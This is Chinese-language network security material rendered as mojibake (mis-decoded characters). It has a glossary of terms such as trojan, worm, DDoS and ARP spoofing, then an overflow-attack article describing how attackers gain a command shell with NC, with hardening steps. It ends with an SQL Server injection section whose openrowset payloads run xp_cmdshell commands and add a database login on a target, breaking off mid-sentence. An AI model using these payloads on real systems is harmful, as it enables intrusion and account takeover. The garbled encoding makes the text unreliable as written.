|
|
ÎÊ:ʲôÊÇÍøÂ簲ȫ?
´ð:ÍøÂ簲ȫÊÇÖ¸ÍøÂçϵͳµÄÓ²¼þ¡¢Èí¼þ¼°ÆäϵͳÖеÄÊý¾ÝÊܵ½±£»¤£¬²»ÒòżȻµÄ»òÕß¶ñÒâµÄÔÒò¶øÔâµ½ÆÆ»µ¡¢¸ü¸Ä¡¢Ð¹Â¶£¬ÏµÍ³¿ÉÒÔÁ¬Ðø¿É¿¿Õý³£µØÔËÐУ¬ÍøÂç·þÎñ²»±»Öжϡ£
ÎÊ:ʲôÊǼÆËã»ú²¡¶¾?
´ð:¼ÆËã»ú²¡¶¾(Computer Virus)ÊÇÖ¸±àÖÆÕßÔÚ¼ÆËã»ú³ÌÐòÖвåÈëµÄÆÆ»µ¼ÆËã»ú¹¦ÄÜ»òÕßÆÆ»µÊý¾Ý£¬Ó°Ïì¼ÆËã»úʹÓò¢ÇÒÄܹ»×ÔÎÒ¸´ÖƵÄÒ»×鼯Ëã»úÖ¸Áî»òÕß³ÌÐò´úÂë¡£
ÎÊ:ʲôÊÇľÂí?
´ð:ľÂíÊÇÒ»ÖÖ´øÓжñÒâÐÔÖʵÄÔ¶³Ì¿ØÖÆÈí¼þ¡£Ä¾ÂíÒ»°ã·ÖΪ¿Í»§¶Ë(client)ºÍ·þÎñÆ÷¶Ë(server)¡£¿Í»§¶Ë¾ÍÊDZ¾µØÊ¹Óõĸ÷ÖÖÃüÁîµÄ¿ØÖÆÌ¨£¬·þÎñÆ÷¶ËÔòÊÇÒª¸ø±ðÈËÔËÐУ¬Ö»ÓÐÔËÐйý·þÎñÆ÷¶ËµÄ¼ÆËã»ú²ÅÄܹ»ÍêÈ«Êܿء£Ä¾Âí²»»áÏñ²¡¶¾ÄÇÑùÈ¥¸ÐȾÎļþ¡£
ÎÊ:ʲôÊÇ·À»ðǽ?ËüÊÇÈçºÎÈ·±£ÍøÂ簲ȫµÄ?
´ð:ʹÓ÷À»ðǽ(Firewall)ÊÇÒ»ÖÖÈ·±£ÍøÂ簲ȫµÄ·½·¨¡£·À»ðǽÊÇÖ¸ÉèÖÃÔÚ²»Í¬ÍøÂç(Èç¿ÉÐÅÈÎµÄÆóÒµÄÚ²¿ÍøºÍ²»¿ÉÐŵĹ«¹²Íø)»òÍøÂ簲ȫÓòÖ®¼äµÄһϵÁв¿¼þµÄ×éºÏ¡£ËüÊDz»Í¬ÍøÂç»òÍøÂ簲ȫÓòÖ®¼äÐÅÏ¢µÄΩһ³öÈë¿Ú£¬Äܸù¾ÝÆóÒµµÄ°²È«Õþ²ß¿ØÖÆ(ÔÊÐí¡¢¾Ü¾ø¡¢¼à²â)³öÈëÍøÂçµÄÐÅÏ¢Á÷£¬ÇÒ±¾Éí¾ßÓнÏÇ¿µÄ¿¹¹¥»÷ÄÜÁ¦¡£ËüÊÇÌṩÐÅÏ¢°²È«·þÎñ£¬ÊµÏÖÍøÂçºÍÐÅÏ¢°²È«µÄ»ù´¡ÉèÊ©¡£
ÎÊ:ʲôÊǺóÃÅ?Ϊʲô»á´æÔÚºóÃÅ?
´ð:ºóÃÅ(Back Door)ÊÇÖ¸Ò»ÖÖÈÆ¹ý°²È«ÐÔ¿ØÖƶø»ñÈ¡¶Ô³ÌÐò»òϵͳ·ÃÎÊȨµÄ·½·¨¡£ÔÚÈí¼þµÄ¿ª·¢½×¶Î£¬³ÌÐòÔ±³£»áÔÚÈí¼þÄÚ´´½¨ºóÃÅÒÔ±ã¿ÉÒÔÐ޸ijÌÐòÖеÄȱÏÝ¡£Èç¹ûºóÃű»ÆäËûÈËÖªµÀ£¬»òÊÇÔÚ·¢²¼Èí¼þ֮ǰûÓÐɾ³ý£¬ÄÇôËü¾Í³ÉÁ˰²È«Òþ»¼¡£
ÎÊ:ʲô½ÐÈëÇÖ¼ì²â??
´ð:ÈëÇÖ¼ì²âÊÇ·À»ðǽµÄºÏÀí²¹³ä£¬°ïÖúϵͳ¶Ô¸¶ÍøÂç¹¥»÷£¬À©Õ¹ÏµÍ³¹ÜÀíÔ±µÄ°²È«¹ÜÀíÄÜÁ¦(°üÀ¨°²È«É󼯡¢¼àÊÓ¡¢½ø¹¥Ê¶±ðºÍÏìÓ¦)£¬Ìá¸ßÐÅÏ¢°²È«»ù´¡½á¹¹µÄÍêÕûÐÔ¡£Ëü´Ó¼ÆËã»úÍøÂçϵͳÖеÄÈô¸É¹Ø¼üµãÊÕ¼¯ÐÅÏ¢£¬²¢·ÖÎöÕâЩÐÅÏ¢£¬¼ì²éÍøÂçÖÐÊÇ·ñÓÐÎ¥·´°²È«²ßÂÔµÄÐÐΪºÍÔ⵽Ϯ»÷µÄ¼£Ïó
ÎÊ:ʲô½ÐÊý¾Ý°ü¼à²â?ËüÓÐʲô×÷ÓÃ?
´ð:Êý¾Ý°ü¼à²â¿ÉÒÔ±»ÈÏΪÊÇÒ»¸ùÇÔÌýµç»°ÏßÔÚ¼ÆËã»úÍøÂçÖеĵȼÛÎï¡£µ±Ä³ÈËÔÚ¡°¼àÌý¡±ÍøÂçʱ£¬ËûÃÇʵ¼ÊÉÏÊÇÔÚÔĶÁºÍ½âÊÍÍøÂçÉÏ´«Ë͵ÄÊý¾Ý°ü¡£Èç¹ûÄãÐèÒªÔÚ»¥ÁªÍøÉÏͨ¹ý¼ÆËã»ú·¢ËÍÒ»·âµç×ÓÓʼþ»òÇëÇóÏÂÔØÒ»¸öÍøÒ³£¬ÕâЩ²Ù×÷¶¼»áʹÊý¾Ýͨ¹ýÄãºÍÊý¾ÝÄ¿µÄµØÖ®¼äµÄÐí¶à¼ÆËã»ú¡£ÕâЩ´«ÊäÐÅϢʱ¾¹ýµÄ¼ÆËã»ú¶¼Äܹ»¿´µ½Äã·¢Ë͵ÄÊý¾Ý£¬¶øÊý¾Ý°ü¼à²â¹¤¾ß¾ÍÔÊÐíijÈ˽ػñÊý¾Ý²¢ÇҲ鿴Ëü¡£
ÎÊ:ʲôÊÇNIDS?
´ð:NIDSÊÇNetwork Intrusion Detection SystemµÄËõд£¬¼´ÍøÂçÈëÇÖ¼ì²âϵͳ£¬Ö÷ÒªÓÃÓÚ¼ì²âHacker»òCrackerͨ¹ýÍøÂç½øÐеÄÈëÇÖÐÐΪ¡£NIDSµÄÔËÐз½Ê½ÓÐÁ½ÖÖ£¬Ò»ÖÖÊÇÔÚÄ¿±êÖ÷»úÉÏÔËÐÐÒÔ¼à²âÆä±¾ÉíµÄͨÐÅÐÅÏ¢£¬ÁíÒ»ÖÖÊÇÔÚһ̨µ¥¶ÀµÄ»úÆ÷ÉÏÔËÐÐÒÔ¼à²âËùÓÐÍøÂçÉ豸µÄͨÐÅÐÅÏ¢£¬±ÈÈçHub¡¢Â·ÓÉÆ÷¡£
ÎÊ:ʲô½ÐSYN°ü?
´ð:TCPÁ¬½ÓµÄµÚÒ»¸ö°ü£¬·Ç³£Ð¡µÄÒ»ÖÖÊý¾Ý°ü¡£SYN¹¥»÷°üÀ¨´óÁ¿´ËÀàµÄ°ü£¬ÓÉÓÚÕâЩ°ü¿´ÉÏÈ¥À´×Ôʵ¼Ê²»´æÔÚµÄÕ¾µã£¬Òò´ËÎÞ·¨ÓÐЧ½øÐд¦Àí¡£
ÎÊ:¼ÓÃܼ¼ÊõÊÇָʲô?
´ð:¼ÓÃܼ¼ÊõÊÇ×î³£Óõݲȫ±£ÃÜÊֶΣ¬ÀûÓü¼ÊõÊֶΰÑÖØÒªµÄÊý¾Ý±äΪÂÒÂë(¼ÓÃÜ)´«ËÍ£¬µ½´ïÄ¿µÄµØºóÔÙÓÃÏàͬ»ò²»Í¬µÄÊֶλ¹Ô(½âÃÜ)¡£
¼ÓÃܼ¼Êõ°üÀ¨Á½¸öÔªËØ:Ëã·¨ºÍÃÜÔ¿¡£Ëã·¨Êǽ«ÆÕͨµÄÐÅÏ¢»òÕß¿ÉÒÔÀí½âµÄÐÅÏ¢ÓëÒ»´®Êý×Ö(ÃÜÔ¿)½áºÏ£¬²úÉú²»¿ÉÀí½âµÄÃÜÎĵIJ½Ö裬ÃÜÔ¿ÊÇÓÃÀ´¶ÔÊý¾Ý½øÐбàÂëºÍ½âÃܵÄÒ»ÖÖËã·¨¡£ÔÚ°²È«±£ÃÜÖУ¬¿Éͨ¹ýÊʵ±µÄÔ¿¼ÓÃܼ¼ÊõºÍ¹ÜÀí»úÖÆÀ´±£Ö¤ÍøÂçµÄÐÅϢͨÐŰ²È«¡£
ÎÊ:ʲô½ÐÈ䳿²¡¶¾?
´ð:È䳿²¡¶¾(Worm)Ô´×ÔµÚÒ»ÖÖÔÚÍøÂçÉÏ´«²¥µÄ²¡¶¾¡£1988Ä꣬22ËêµÄ¿µÄζû´óѧÑо¿ÉúÂÞ²®ÌØ¡£ÄªÀï˹(Robert Morris)ͨ¹ýÍøÂç·¢ËÍÁËÒ»ÖÖרΪ¹¥»÷UNIXϵͳȱÏÝ¡¢ÃûΪ¡°È䳿¡±(Worm)µÄ²¡¶¾¡£È䳿Ôì³ÉÁË6000¸öϵͳ̱»¾£¬¹À¼ÆËðʧΪ200Íòµ½6000ÍòÃÀÔª¡£ÓÉÓÚÕâÖ»È䳿µÄµ®Éú£¬ÔÚÍøÉÏ»¹×¨ÃųÉÁ¢Á˼ÆËã»úÓ¦¼±Ð¡×é(CERT)¡£ÏÖÔÚÈ䳿²¡¶¾¼Ò×åÒѾ׳´óµ½³ÉǧÉÏÍòÖÖ£¬²¢ÇÒÕâǧÍòÖÖÈ䳿²¡¶¾´ó¶¼³ö×ÔºÚ¿ÍÖ®ÊÖ¡£
ÎÊ:ʲôÊDzÙ×÷ϵͳÐͲ¡¶¾?ËüÓÐʲôΣº¦?
´ð:ÕâÖÖ²¡¶¾»áÓÃËü×Ô¼ºµÄ³ÌÐò¼ÓÈë²Ù×÷ϵͳ»òÕßÈ¡´ú²¿·Ö²Ù×÷ϵͳ½øÐй¤×÷£¬¾ßÓкÜÇ¿µÄÆÆ»µÁ¦£¬»áµ¼ÖÂÕû¸öϵͳ̱»¾¡£¶øÇÒÓÉÓÚ¸ÐȾÁ˲Ù×÷ϵͳ£¬ÕâÖÖ²¡¶¾ÔÚÔËÐÐʱ£¬»áÓÃ×Ô¼ºµÄ³ÌÐòƬ¶ÏÈ¡´ú²Ù×÷ϵͳµÄºÏ·¨³ÌÐòÄ£¿é¡£¸ù¾Ý²¡¶¾×ÔÉíµÄÌØµãºÍ±»Ìæ´úµÄ²Ù×÷ϵͳÖкϷ¨³ÌÐòÄ£¿éÔÚ²Ù×÷ϵͳÖÐÔËÐеĵØÎ»Óë×÷Óã¬ÒÔ¼°²¡¶¾È¡´ú²Ù×÷ϵͳµÄÈ¡´ú·½Ê½µÈ£¬¶Ô²Ù×÷ϵͳ½øÐÐÆÆ»µ¡£Í¬Ê±£¬ÕâÖÖ²¡¶¾¶ÔϵͳÖÐÎļþµÄ¸ÐȾÐÔÒ²ºÜÇ¿¡£
ÎÊ:ĪÀï˹È䳿ÊÇָʲô?ËüÓÐÊ²Ã´ÌØµã?
´ð:ËüµÄ±àдÕßÊÇÃÀ¹ú¿µÄ˶û´óѧһÄê¼¶Ñо¿ÉúÂÞÌØ¡£ÄªÀï˹¡£Õâ¸ö³ÌÐòÖ»ÓÐ99ÐУ¬ÀûÓÃÁËUnixϵͳÖеÄȱµã£¬ÓÃFingerÃüÁî²éÁª»úÓû§Ãûµ¥£¬È»ºóÆÆÒëÓû§¿ÚÁÓÃMailϵͳ¸´ÖÆ¡¢´«²¥±¾ÉíµÄÔ´³ÌÐò£¬ÔÙ±àÒëÉú³É´úÂë¡£
×î³õµÄÍøÂçÈ䳿Éè¼ÆÄ¿µÄÊǵ±ÍøÂç¿ÕÏÐʱ£¬³ÌÐò¾ÍÔÚ¼ÆËã»ú¼ä¡°Óε´¡±¶ø²»´øÀ´ÈκÎË𺦡£µ±ÓлúÆ÷¸ººÉ¹ýÖØÊ±£¬¸Ã³ÌÐò¿ÉÒÔ´Ó¿ÕÏмÆËã»ú¡°½èÈ¡×ÊÔ´¡±¶ø´ïµ½ÍøÂçµÄ¸ºÔØÆ½ºâ¡£¶øÄªÀï˹È䳿²»ÊÇ¡°½èÈ¡×ÊÔ´¡±£¬¶øÊÇ¡°ºÄ¾¡ËùÓÐ×ÊÔ´¡±¡£
ÎÊ:ʲôÊÇDDoS?Ëü»áµ¼ÖÂʲôºó¹û?
´ð:DDoSÒ²¾ÍÊÇ·Ö²¼Ê½¾Ü¾ø·þÎñ¹¥»÷¡£ËüʹÓÃÓëÆÕͨµÄ¾Ü¾ø·þÎñ¹¥»÷ͬÑùµÄ·½·¨£¬µ«ÊÇ·¢Æð¹¥»÷µÄÔ´ÊǶà¸ö¡£Í¨³£¹¥»÷ÕßʹÓÃÏÂÔØµÄ¹¤¾ßÉøÍ¸ÎÞ±£»¤µÄÖ÷»ú£¬µ±»ñµÃ¸ÃÖ÷»úµÄÊʵ±µÄ·ÃÎÊȨÏ޺󣬹¥»÷ÕßÔÚÖ÷»úÖа²×°Èí¼þµÄ·þÎñ»ò½ø³Ì(ÒÔϼò³Æ´úÀí)¡£ÕâЩ´úÀí±£³Ö˯Ãß״̬£¬Ö±µ½´ÓËüÃǵÄÖ÷¿Ø¶ËµÃµ½Ö¸Á¶ÔÖ¸¶¨µÄÄ¿±ê·¢Æð¾Ü¾ø·þÎñ¹¥»÷¡£Ëæ×ÅΣº¦Á¦¼«Ç¿µÄºÚ¿Í¹¤¾ßµÄ¹ã·º´«²¥Ê¹Ó㬷ֲ¼Ê½¾Ü¾ø·þÎñ¹¥»÷¿ÉÒÔͬʱ¶ÔÒ»¸öÄ¿±ê·¢Æð¼¸Ç§¸ö¹¥»÷¡£µ¥¸öµÄ¾Ü¾ø·þÎñ¹¥»÷µÄÍþÁ¦Ò²Ðí¶Ô´ø¿í½Ï¿íµÄÕ¾µãûÓÐÓ°Ï죬¶ø·Ö²¼ÓÚÈ«ÇòµÄ¼¸Ç§¸ö¹¥»÷½«»á²úÉúÖÂÃüµÄºó¹û¡£
ÎÊ:¾ÖÓòÍøÄÚ²¿µÄARP¹¥»÷ÊÇָʲô?
´ð:ARPÐÒéµÄ»ù±¾¹¦ÄܾÍÊÇͨ¹ýÄ¿±êÉ豸µÄIPµØÖ·£¬²éѯĿ±êÉ豸µÄMACµØÖ·£¬ÒÔ±£Ö¤Í¨ÐŵĽøÐС£
»ùÓÚARPÐÒéµÄÕâÒ»¹¤×÷ÌØÐÔ£¬ºÚ¿ÍÏò¶Ô·½¼ÆËã»ú²»¶Ï·¢ËÍÓÐÆÛÕ©ÐÔÖʵÄARPÊý¾Ý°ü£¬Êý¾Ý°üÄÚ°üº¬ÓÐÓ뵱ǰÉè±¸ÖØ¸´µÄMacµØÖ·£¬Ê¹¶Ô·½ÔÚ»ØÓ¦±¨ÎÄʱ£¬ÓÉÓÚ¼òµ¥µÄµØÖ·Öظ´´íÎó¶øµ¼Ö²»ÄܽøÐÐÕý³£µÄÍøÂçͨÐÅ¡£Ò»°ãÇé¿öÏ£¬Êܵ½ARP¹¥»÷µÄ¼ÆËã»ú»á³öÏÖÁ½ÖÖÏÖÏó:
1.²»¶Ïµ¯³ö¡°±¾»úµÄXXX¶ÎÓ²¼þµØÖ·ÓëÍøÂçÖеÄXXX¶ÎµØÖ·³åÍ»¡±µÄ¶Ô»°¿ò¡£
2.¼ÆËã»ú²»ÄÜÕý³£ÉÏÍø£¬³öÏÖÍøÂçÖжϵÄÖ¢×´¡£
ÒòΪÕâÖÖ¹¥»÷ÊÇÀûÓÃARPÇëÇó±¨ÎĽøÐС°ÆÛÆ¡±µÄ£¬ËùÒÔ·À»ðǽ»áÎóÒÔΪÊÇÕý³£µÄÇëÇóÊý¾Ý°ü£¬²»ÓèÀ¹½Ø¡£Òò´ËÆÕͨµÄ·À»ðǽºÜÄѵֵ²ÕâÖÖ¹¥»÷¡£
ÎÊ:ʲô½ÐÆÛƹ¥»÷?ËüÓÐÄÄЩ¹¥»÷·½Ê½?
´ð:ÍøÂçÆÛƵļ¼ÊõÖ÷ÒªÓÐ:HONEYPOTºÍ·Ö²¼Ê½HONEYPOT¡¢ÆÛƿռ似ÊõµÈ¡£Ö÷Òª·½Ê½ÓÐ:IPÆÛÆ¡¢ARPÆÛÆ¡¢DNSÆÛÆ¡¢WebÆÛÆ¡¢µç×ÓÓʼþÆÛÆ¡¢Ô´Â·ÓÉÆÛÆ(ͨ¹ýÖ¸¶¨Â·ÓÉ£¬ÒÔ¼ÙðÉí·ÝÓëÆäËûÖ÷»ú½øÐкϷ¨Í¨ÐÅ»ò·¢Ëͼٱ¨ÎÄ£¬Ê¹Êܹ¥»÷Ö÷»ú³öÏÖ´íÎó¶¯×÷)¡¢µØÖ·ÆÛÆ(°üÀ¨Î±ÔìÔ´µØÖ·ºÍαÔìÖмäÕ¾µã)µÈ¡£
ÍøÂç¡°Òç³ö¹¥»÷¡±¹¥·À¼
Ëæ×ÅÍøÂçÆÕ¼°£¬´óÁ¿¹«¿ªµÄShellcode(¡°Òç³ö¡±´úÂë)ÓëÒç³ö¹¥»÷ÔÀí¶¼ÄÜÔÚ¸÷´ó°²È«ÍøÕ¾ÖÐÕÒµ½£¬Ò²ÓÉ´ËÑÜÉúÁËһϵÁа²È«Òþ»¼£¬ºÜ¶àÉÔ΢Á˽âÍøÂ簲ȫ֪ʶµÄÈ˶¼¿ÉÒÔÀûÓÃÏֳɵĹ¥»÷Èí¼þÇáÒ×·¢¶¯Òç³ö¹¥»÷»ñµÃ·þÎñÆ÷ȨÏÞ¡£
1.ʲôÊÇ¡°Òç³ö¹¥»÷¡±£¿
¡°Òç³ö¹¥»÷¡±¾ÍÏñÊǽ«ºÜ¶àɳ×Óµ¹Èë×°ÂúË®µÄÈÝÆ÷ʱ£¬Ë®¾Í»áÒç³öÀ´Ò»Ñù¡£Ä¿Ç°£¬´ó¶àÒç³ö¹¥»÷¶¼ÊÇÕë¶Ô»º³åÇøµÄÒç³ö¡£µ±»º³åÇøÒç³öʱ£¬¹ýÊ£µÄÐÅÏ¢¶ÔµçÄÔÄÚ´æÖÐÔÓÐÄÚÈݽøÐÐÍêÈ«Ìæ»»£¬Èçδ½øÐб¸·Ý£¬ÄãµÄÄÚÈݾÍÓÀÔ¶¶ªÊ§ÁË¡£
ÏÖÔÚÍøÉϹ«²¼µÄ¹¥»÷³ÌÐò²»½ö¾ßÓÐÆÆ»µÎļþµÄ¹¦ÄÜ£¬Ò»°ã»¹»áµÃµ½ÏµÍ³È¨ÏÞµÄCMDSHELL(¹ÜÀíÃüÁîÐÐ)£¬ÄÇËüÓÖÊÇÈçºÎʵÏÖµÄÄØ£¿¡°Òç³ö¹¥»÷¡±ÔÚ¶Ô»º³åÇøÖеÄÎļþ½øÐÐÌæ»»µÄͬʱ£¬»¹»áÖ´ÐÐһЩ·Ç·¨³ÌÐò£¬´Ó¶øµÃµ½ÃüÁîÐÐϵĹÜÀíԱȨÏÞ£¬Ö®ºó¹¥»÷ÕßÔÙͨ¹ýÃüÁîÐн¨Á¢¹ÜÀíÔ±Õ˺ţ¬¶ÔµçÄÔ½øÐпØÖÆ¡£
2.¡°Òç³ö¹¥»÷¡±µÄʵÏÖ
Ò»°ãÈëÇÖÕßÔÚÍøÉÏÁ˽â»ò·¢ÏÖÁË¿ÉÒÔ½øÐÐÒç³ö¹¥»÷µÄ©¶´ºó£¬Ê¹ÓÃȱÏÝɨÃèÆ÷(ÈçÈ«ÃæÉ¨ÃèµÄX-SCAN¡¢Õë¶Ôµ¥Ò»Â©¶´É¨ÃèµÄIIS WEBDAVµÈ¹¤¾ß)ÕÒµ½²¢È·ÈÏ´æÔÚÔ¶³ÌÒç³ö©¶´µÄµçÄÔ£¬½Ó×űãʹÓÃÀûÓù¥»÷´úÂë±à³Ì³É¹¦µÄExploit(¹¥»÷³ÌÐò)·¢ËÍShellcode¹¥»÷£¬È·ÈÏÔ¶³ÌÒç³ö³É¹¦ºóʹÓÃNC»òTELNETµÈ³ÌÐòÁ¬½Ó±»Òç³öÖ÷»úµÄ¶Ë¿Ú´Ó¶øµÃµ½CMDSHELL¡£
±ÈÈçǰ¶Îʱ¼äΣº¦Ìرð´óµÄMS05039Òç³ö©¶´£¬¾ÍÊÇÏÈÀûÓÃMS05039ScanÀ´É¨ÃèÓЩ¶´µÄµçÄÔ£¬È»ºó´ò¿ªÁ½¸öÃüÁîÌáʾ·û´°¿Ú£¬Ò»¸öÓÃÀ´µÃµ½CMDSHELLµÄNC£¬Ò»¸öÖ´ÐÐÒç³ö¹¥»÷³ÌÐò£¬µ±Ö´Ðй¥»÷³ÌÐòºó£¬¾ÍµÃµ½ÁËϵͳȨÏÞµÄCMDSHELL¡£
3.ÈçºÎ¶ÔÒç³ö¹¥»÷½øÐзÀ»¤£¿
˵µ½·À»¤£¬Ê×Ïȶ¨Ê±¸üÐÂÓÐЧ²¹¶¡¡£µ«Èç¹û¹¥»÷ÕßÓõÄÊÇÉÐδ·¢²¼²¹¶¡µÄ¹¥»÷³ÌÐòÄØ£¿ËùÒÔ´ò²¹¶¡ÊÇÓÐЧ£¬µ«²»ÊÇΩһµÄ·½·¨¡£ÏÂÃæ¾ÍÀ´¿´¿´ÈçºÎÊÖ¶¯ÉèÖ㬶ÔÒç³ö¹¥»÷½øÐзÀÓù¡£
µÚÒ»²½£ºÔÚWindows 2000/2003£¬¿ÉÒÔ½¨Á¢Ò»¸öÓû§£¬Èçboxer£¬ÃÜÂë×îºÃÓôóÓÚ8λµÄÊý×ÖÓë×ÖĸµÄ»ìºÏ·½Ê½£¬¶øÇÒÈç¹û¾õµÃ»¹²»¹»Ç¿×³£¬¿ÉÒÔÔÚÓû§µÄÃû³ÆÇ°Ãæ¼ÓÉÏÒ»¸ö$¡£ÕâÑù£¬¿ÉÒÔ½¨Á¢Ò»¸öÒþ²ØÕË»§£¬ÈëÇÖʱ¹¥»÷ÕßÎÞ·¨ÀûÓá°net user boxer password¡±ÃüÁîÀ´ÐÞ¸ÄÕâ¸öÓû§µÄÃÜÂë¡£ÁíÍâÇ¿µ÷Ò»µã£¬ÄǸöÓû§±ØÐëÊÇUSER×éµÄ¡£
µÚ¶þ²½£º¶ÔÓÚWindows 2000/2003£¬½¨Á¢Óû§ºó£¬´ò¿ªC:\WINNT\System32(ϵͳ°²×°ÔÚCÅÌ)£¬ÕÒµ½cmd.exe£¬ÓÃÓÒ¼üÑ¡Ôñ¡°ÊôÐÔ¡±ÏÔÚ¡°°²È«¡±±êÇ©ÏÂÐÞ¸Äcmd.exeµÄ·ÃÎÊȨÏÞ£¬Ö»±£Áô¸Õ¸Õн¨Á¢µÄboxerÓû§¶Ôcmd.exeµÄÍêÈ«¿ØÖÆÈ¨ÏÞ£¬½«ÆäËûÓû§È«²¿É¾³ý£¬ÓÈÆäÊÇEveryone¡£Ö®ºó£¬ÕÒµ½net.exeÎļþ£¬°´ÕÕcmd.exeµÄ·½·¨½øÐÐÉèÖã¬Èç¹ûÔÚÕÒµ½net.exeµÄͬʱ£¬»¹·¢ÏÖÁËnet1.exe£¬Ò²ÒªÒ»Í¬ÉèÖÃÒ»ÑùµÄȨÏÞ£¬Íê³ÉÉÏÊöÏÞÖÆºó£¬×î»ù±¾µÄ·ÀÓù´ëÊ©¾ÍÍê³ÉÁË¡£
ÔÚWindows XPÏ£¬cmd.exeµÄ¡°ÊôÐÔ¡±Ñ¡ÏîÀïÒѾûÓÐÁË¡°°²È«¡±±êÇ©£¬¿ÉÒÔµã»÷¡°¿ªÊ¼¡úÔËÐС±£¬ÊäÈëgpedit.msc£¬´ò¿ª¡°×é²ßÂÔ¡±´°¿Ú¡£ÔÚ×é²ßÂÔÖУ¬ÒÀ´ÎÕ¹¿ª¡°¼ÆËã»úÅäÖáúWindows ÉèÖáúÈí¼þÏÞÖÆ²ßÂÔ¡±£¬ÓÒ»÷ºó£¬Ñ¡Ôñ¡°´´½¨ÐµIJßÂÔ¡±¡£È»ºó£¬¼ÌÐøÕ¹¿ª¡°Èí¼þÏÞÖÆ²ßÂÔ¡úÆäËû¹æÔò¡±ÏÓÒ»÷¸ÃÏѡÔñ¡°Ð¼üÉ¢ÁйæÔò¡±¡£ÔÚµ¯³ö´°¿ÚÖеã»÷¡°ä¯ÀÀ¡±°´Å¥£¬Ñ¡ÔñC:\WINNT\System32ϵÄcmd.exeÎļþ£¬ÉèÖá°°²È«¼¶±ð¡±Îª¡°²»ÔÊÐíµÄ¡±¡£¶Ônet.exeÎļþÖ´ÐÐͬÑùµÄ²Ù×÷£¬½øÐÐÏÞÖÆ¡£
Windows XPÖо¹ýÉèÖúóÈκÎÓû§½«²»Äܵ÷ÓÃcmd.exeºÍnet.exeÃüÁîÁË¡£´Ë·½·¨Ö»ÊʺÏÔÚÒç³ö³ÌÐò±»·¢²¼ºóûÓÐÏà¹ØµÄ²¹¶¡Çé¿öϽøÐÐÓ¦¼±·À»¤£¬Èç¹ûÓû§²»ÐèÒªÓõ½cmd.exe¼°net.exeÃüÁî¡£ÍÆ¼ö´ËÀûÓ÷½Ê½½ûÖ¹ÔËÐС£
ÁíÍ⻹ÓÐÒ»ÖÖÇé¿ö¾ÍÊÇһЩ¹¥»÷Õß¿ÉÄÜͨ¹ýÆäËû;¾¶µÃµ½Óû§µçÄÔÉÏijЩÈí¼þµÄ²Ù¿ØÈ¨ÏÞ£¬ÈçFTP·þÎñ¡¢WEB·þÎñµÈ£¬ÔÚÕâÖÖÇé¿öϺܿÉÄܳöÏÖÀûÓÃWindowsϵͳ±¾ÉíµÄTFTP·þÎñ½øÐÐľÂíÉÏ´«»ò±¾µØÒç³ö³ÌÐò¡£ËùÒÔ£¬×îºóÔÙÀ´½²½âһϷÀÖ¹¹¥»÷ÕßÀûÓÃTFTP:½øÈëC:\WINNT\System32\Drivers\Etc£¬Óá°¼Çʱ¾¡±´ò¿ªÎļþservices£¬°ÑTFTP¶Ë¿Ú¸ÄΪ0¡£ÕâÑù£¬¹¥»÷Õß¾ÍÎÞ·¨Í¨¹ýʹÓÃTFTPÖ¸Áî´«ÊäÒç³ö³ÌÐòÁË¡£µ±È»£¬ÎªÁ˸üºÃµÄ°²È«ÐÔ£¬Ò²¿ÉÒÔ½«TFTP.EXEÎļþ£¬°´Ç°Ãæ½éÉܵķ½·¨£¬Ìí¼ÓΪֻÄÜÈÃboxerÓû§²ÅÄÜʹÓõÄÃüÁî¡£
ͨ¹ýÉÏÃæ²Ù×÷ºó£¬Ò»°ãÓû§µÄµçÄÔ¾ÍÄÜ·ÀÓù´ó²¿·ÖÕë¶Ô¸öÈËÓû§µÄÒç³ö¹¥»÷ÁË¡£
Çë×¢ÒâÄÇЩÈÝÒ×±»ºöÂÔµÄSQL×¢Èë¼¼ÇÉ
ÏÂÃæÎÒҪ̸µ½Ò»Ð©SqlserverеÄBug£¬ËäÈ»±¾È˾¹ý³¤Ê±¼äµÄŬÁ¦£¬µ±È»Ò²ÓеãÐÒÔ˵ijɷÖÔÚÄÚ£¬²ÅµÃÒÔ·¢ÏÖ£¬²»¸ÒÒ»¸öÈ˶ÀÏí£¬ÄóöÀ´Çë´ó¼Ò¼ø±ð¡£
1£®¹ØÓÚOpenrowsetºÍOpendatasource
¿ÉÄÜÕâ¸ö¼¼ÇÉÔçÓÐÈËÒѾ»áÁË£¬¾ÍÊÇÀûÓÃopenrowset·¢Ëͱ¾µØÃüÁͨ³£ÎÒÃǵÄÓ÷¨ÊÇ£¨°üÀ¨MSDNµÄÁÐ×Ó£©ÈçÏ£º
select * from openrowset('sqloledb','myserver';'sa';'','select * from
table')
¿É¼û£¨¼´Ê¹´Ó×ÖÃæÒâÒåÉÏ¿´)openrowsetÖ»ÊÇ×÷Ϊһ¸ö¿ì½ÝµÄÔ¶³ÌÊý¾Ý¿â·ÃÎÊ£¬Ëü±ØÐë¸úÔÚselectºóÃæ£¬Ò²¾ÍÊÇ˵ÐèÒª·µ»ØÒ»¸örecordset ¡£
ÄÇôÎÒÃÇÄܲ»ÄÜÀûÓÃËüµ÷ÓÃxp_cmdshellÄØ£¿´ð°¸Êǿ϶¨µÄ£¡
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off
exec master.dbo.xp_cmdshel l ''dir c:\''')
±ØÐë¼ÓÉÏset fmtonly offÓÃÀ´ÆÁ±ÎĬÈϵÄÖ»·µ»ØÁÐÐÅÏ¢µÄÉèÖã¬ÕâÑùxp_cmdshell·µ»ØµÄoutput¼¯ºÏ¾Í»áÌá½»¸øÇ°ÃæµÄselectÏÔʾ£¬Èç¹û²ÉÓÃĬÈÏÉèÖ㬻᷵»Ø¿Õ¼¯ºÏµ¼ÖÂselect³ö´í£¬ÃüÁîÒ²¾ÍÎÞ·¨Ö´ÐÐÁË¡£
ÄÇôÈç¹ûÎÒÃÇÒªµ÷ÓÃsp_addloginÄØ£¬Ëû²»»áÏñxp_cmdshell·µ»ØÈκμ¯ºÏµÄ£¬ÎÒÃǾͲ»ÄÜÔÙÒÀ¿¿fmtonlyÉèÖÃÁË£¬¿ÉÒÔÈçϲÙ×÷
select * from openrowset('sqloledb','server';'sa';'','select ''OK!''
exec master.dbo.sp_addlogin Hectic')
ÕâÑù£¬ÃüÁîÖÁÉٻ᷵»Øselect OK!'µÄ¼¯ºÏ£¬ÄãµÄ»úÆ÷ÉÌ»áÏÔʾOK!£¬Í¬Ê±¶Ô·½µÄÊý¾Ý¿âÄÚÒ²»áÔö¼ÓÒ»¸öHecticµÄÕ˺ţ¬Ò²¾ÍÊÇ˵£¬ÎÒÃÇÀûÓÃ
